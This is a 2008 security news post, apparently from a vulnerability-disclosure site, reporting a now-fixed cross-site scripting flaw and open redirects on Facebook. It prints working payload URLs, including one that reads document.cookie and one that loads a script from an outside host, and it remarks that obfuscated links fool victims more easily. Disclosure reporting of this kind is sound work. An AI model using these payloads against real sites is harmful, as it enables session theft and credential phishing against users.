Facebook vulnerable to XSS. Over 70 million users are at risk.Written by DPThursday, 22 May 2008 Update:
It has been fixed on 23/05/08.
Few more Facebook direct redirect vulnerabilities expose users to security risks:
http://m.facebook.com/login.php?http&next=http%3A%2F%2Fxssed.com ( you have to log in)
Mirrors:
http://www.xssed.com/mirror/34274/
http://www.xssed.com/mirror/39581/
--
Mox has submitted a critical cross-site scripting vulnerability affecting Facebook.com - according to Alexa is currently ranked the 7th most used site on the web.
Malicious people can exploit this issue to execute script code in the context of Facebook or obtain sensitive information from its users, such us cleartext authentication credentials with a fake login form.
It should be noted that this XSS vuln leaves millions of unsuspecting Facebook users vulnerable to malware, spyware and adware infection.
http://www.facebook.com/jobs/position.php?st=
%22%3E%3Ciframe%20src=http://xssed.com%3E%3C/iframe%3E
%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.facebook.com/jobs/position.php?st=
%3CSCRIPT%20SRC=//ha.ckers.org/.j%3E
It is much easier to be fooled and click the link if the attack vectors are obfuscated... (or inserted in a hidden iframe)
Mirror:
http://www.xssed.com/mirror/39468/
Facebook has been XSSed multiple times in the past:
http://www.xssed.com/search?key=facebook
I'm quite sure there are more cross-site scripting issues on Facebook. It is only a matter of time for the next one to be discovered by a security conscious individual.
We hope this one gets fixed quickly.
Related News:
"Facebook Vulnerable To Serious XSS Attack" - George Hulme, InformationWeek
"Facebook poked by XSS flaw" - John Leyden, Channel Register UK
"Facebook vulnerable to critical XSS, could lead to malware attacks" - Dancho Danchev, ZDNet Zero Day Blog
|